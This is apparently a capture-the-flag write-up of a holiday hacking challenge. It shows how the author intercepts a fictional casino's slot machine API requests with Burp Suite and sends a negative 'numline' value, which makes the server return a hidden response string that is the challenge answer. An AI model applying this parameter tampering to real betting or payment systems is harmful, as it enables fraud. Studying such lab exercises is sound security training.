Slot Machine Investigation

Challenge : Test the security of Jack Frost's slot machines. What does the Jack Frost Tower casino security team threaten to do when your coin total exceeds 1000? Submit the string in the server data.response element. Talk to Noel Boetie outside Santa's Castle for help.
Difficulty Level :	Location : Frost Tower Lobby	Elf/Troll : Hubris Selfington

Hints from Hubris Selfington The big boss told me he’s worried about vulnerabilities in his slot machines, especially this one. Statistically speaking, it seems to be paying out way too much. He asked me to see if there are any security flaws in it. The boss has HUGE plans and we’ve gotta make sure we are running a tight ship here at Frost Tower. Hint: The objective states “Submit the string in the server data. response element”

Clicking on the slot machine behind the troll opens https://slots.jackfrosttower.com where we can click “Play game” to open the game.

We open Burp Suite and capture traffic for only slots.jackfrosttower.com.
Click "Spin" in the bottom right corner.

Burp intercepts the requests and shows a POST request to the /api/v1//spin with three parameters:

1. betamount
2. numline
3. cpl

We investigate with repeater, sending 1001 to the betamount parameter and It does not work.

Keeping the betamount parameter as 1001 (because we need to bet with >1000 coins), we manipulate the other two parameters, numline and cpl, send them to the API to see if we are successful.

Manipulating parameter values	Request	Response
Decrease cpl to 0.0
Increase cpl to 0.2
Decrease numline to 10
Increase numline to 30
Make numline a negative number

Full request and response showing sending a negative value in the numline parameter would show a message in a new field named "response".

The successful response shown below :

data.response :
I'm going to have some bouncer trolls bounce you right out of this casino!

We submit the highlighted as the answer for the Slot Machine Investigation objective and its accepted!